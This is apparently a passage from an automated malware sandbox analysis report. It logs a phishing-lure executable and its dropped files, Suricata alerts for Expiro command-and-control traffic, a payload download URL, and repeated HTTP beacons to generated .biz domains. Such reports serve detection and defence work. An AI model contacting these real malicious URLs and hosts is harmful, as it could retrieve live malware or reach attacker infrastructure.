                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,22_2_001A4EC1
                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_0019532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,22_2_0019532E
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe

                  Networking

                  Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.9:49709 -> 54.244.188.177:80
                  Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.9:49551 -> 1.1.1.1:53
                  Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.9:64135 -> 1.1.1.1:53
                  Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.9:51600 -> 1.1.1.1:53
                  Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.9:62925 -> 1.1.1.1:53
                  Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.9:49737 -> 82.112.184.197:80
                  Source: Malware configuration extractor | URLs: https://lwaziacademy.com/royal/233_Sdvvfamydeo
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B2E4B8 InternetCheckConnectionA,0_2_02B2E4B8
                  Source: global traffic | TCP traffic: 192.168.2.9:49725 -> 103.20.200.105:587
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: Joe Sandbox View | IP Address: 13.248.148.254 13.248.148.254
                  Source: Joe Sandbox View | IP Address: 172.234.222.143 172.234.222.143
                  Source: unknown | DNS query: name: checkip.dyndns.org
                  Source: unknown | DNS query: name: reallyfreegeoip.org
                  Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49707 -> 41.185.8.252:443
                  Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.9:49718
                  Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.9:49718
                  Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.9:49723
                  Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.9:49723
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49710 -> 158.101.44.242:80
                  Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.9:49720
                  Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.9:49720
                  Source: global traffic | HTTP traffic detected: GET /royal/233_Sdvvfamydeo HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: lwaziacademy.com
                  Source: global traffic | HTTP traffic detected: POST /nimjw HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 802
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                  Source: global traffic | HTTP traffic detected: POST /jae HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ssbzmoy.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 802
                  Source: global traffic | HTTP traffic detected: POST /kka HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: POST /fapn HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: cvgrf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 802
                  Source: global traffic | HTTP traffic detected: POST /fupmvmgjbhmts HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ssbzmoy.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: POST /xujrrbphgxpfxye HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: npukfztj.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 802
                  Source: global traffic | HTTP traffic detected: POST /npdqgsoqmq HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: cvgrf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: POST /obujsmdylt HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 802
                  Source: global traffic | HTTP traffic detected: GET /obujsmdylt HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Host: ww99.przvgke.biz
                  Source: global traffic | HTTP traffic detected: POST /cbecuogqej HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: npukfztj.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: POST /bjede HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: POST /cairvr HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 802
                  Source: global traffic | HTTP traffic detected: GET /bjede HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Host: ww99.przvgke.biz
                  Source: global traffic | HTTP traffic detected: GET /cairvr HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Host: ww99.przvgke.biz
                  Source: global traffic | HTTP traffic detected: GET /bjede?usid=18&utid=28672493896 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Host: ww12.przvgke.biz
                  Source: global traffic | HTTP traffic detected: GET /cairvr?usid=18&utid=28672493914 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Host: ww7.przvgke.biz
                  Source: global traffic | HTTP traffic detected: POST /fauopp HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: POST /uoxisrajk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: knjghuig.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 802
                  Source: global traffic | HTTP traffic detected: GET /fauopp HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Host: ww99.przvgke.biz
                  Source: global traffic | HTTP traffic detected: GET /fauopp?usid=18&utid=28672494417 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Host: ww12.przvgke.biz
                  Source: global traffic | HTTP traffic detected: POST /jedofahyn HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: knjghuig.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: POST /ahrvaxreoca HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: lpuegx.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 802
                  Source: global traffic | HTTP traffic detected: POST /tjgeolaydho HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: lpuegx.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: POST /bwbcqohd HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: lpuegx.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 802
                  Source: global traffic | HTTP traffic detected: POST /pfoxkxwneqnmhcsc HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: lpuegx.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: POST /goescaydbiatn HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vjaxhpbji.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 802
                  Source: global traffic | HTTP traffic detected: POST /ewvwgr HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vjaxhpbji.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: POST /ovwmjligotchf HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vjaxhpbji.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 802
                  Source: global traffic | HTTP traffic detected: POST /eooel HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vjaxhpbji.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.9:49712 version: TLS 1.0
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic | DNS traffic detected: DNS query: lwaziacademy.com
                  Source: global traffic | DNS traffic detected: DNS query: pywolwnvd.biz
                  Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global traffic | DNS traffic detected: DNS query: ssbzmoy.biz
                  Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global traffic | DNS traffic detected: DNS query: cvgrf.biz
                  Source: global traffic | DNS traffic detected: DNS query: npukfztj.biz
                  Source: global traffic | DNS traffic detected: DNS query: przvgke.biz
                  Source: global traffic | DNS traffic detected: DNS query: ww99.przvgke.biz
                  Source: global traffic | DNS traffic detected: DNS query: webmail.thematman.com.au
                  Source: global traffic | DNS traffic detected: DNS query: ww12.przvgke.biz
                  Source: global traffic | DNS traffic detected: DNS query: ww7.przvgke.biz
                  Source: global traffic | DNS traffic detected: DNS query: zlenh.biz
                  Source: global traffic | DNS traffic detected: DNS query: knjghuig.biz
                  Source: global traffic | DNS traffic detected: DNS query: uhxqin.biz
                  Source: global traffic | DNS traffic detected: DNS query: anpmnmxo.biz
                  Source: global traffic | DNS traffic detected: DNS query: lpuegx.biz
                  Source: global traffic | DNS traffic detected: DNS query: vjaxhpbji.biz
                  Source: unknown | HTTP traffic detected: POST /nimjw HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 802
                  Source: alg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143:80/bjede
                  Source: alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052928274.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1826309227.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143:80/fauopp
                  Source: alg.exe, 0000000C.00000003.1825992446.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1826309227.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/jedofahyn
                  Source: alg.exe, 0000000C.00000003.1825992446.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/jedofahynK
                  Source: alg.exe, 0000000C.00000003.1700499143.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1668813012.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1685939273.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/fupmvmgjbhmts
                  Source: alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052928274.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1826309227.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/jedofahynusid=18&utid=28672494417
                  Source: alg.exe, 0000000C.00000003.1700499143.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/cbecuogqej
                  Source: alg.exe, 0000000C.00000003.1644704325.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                  Source: alg.exe, 0000000C.00000003.1644704325.000000000056F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1644501807.000000000058C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/kka
                  Source: alg.exe, 0000000C.00000003.1685939273.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/npdqgsoqmqY
                  Source: alg.exe, 0000000C.00000003.1700499143.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1685939273.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/npdqgsoqmq
                  Source: alg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
                  Source: alg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/eooel
                  Source: alg.exe, 0000000C.00000002.2678337066.00000000005B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/eooelngs
                  Source: alg.exe, 0000000C.00000003.2503862949.00000000005B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/ewvwgr
                  Source: alg.exe, 0000000C.00000003.2503862949.00000000005B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/ewvwgrngs
                  Source: alg.exe, 0000000C.00000003.2503862949.00000000005B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/ewvwgroU
                  Source: alg.exe, 0000000C.00000003.2279374376.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2280831077.00000000005B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/pfoxkxwneqnmhcsc
                  Source: alg.exe, 0000000C.00000003.2053936887.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/tjgeolaydho
                  Source: alg.exe, 0000000C.00000003.2053936887.00000000005B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/tjgeolaydhoK
                  Source: alg.exe, 0000000C.00000002.2678337066.000000000058A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197:80/eooelpp
                  Source: alg.exe, 0000000C.00000002.2678337066.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504408832.000000000058A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197:80/ewvwgrydho;
                  Source: alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197:80/pfoxkxwneqnmhcscM
                  Source: alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052928274.000000000058A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197:80/tjgeolaydho;
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
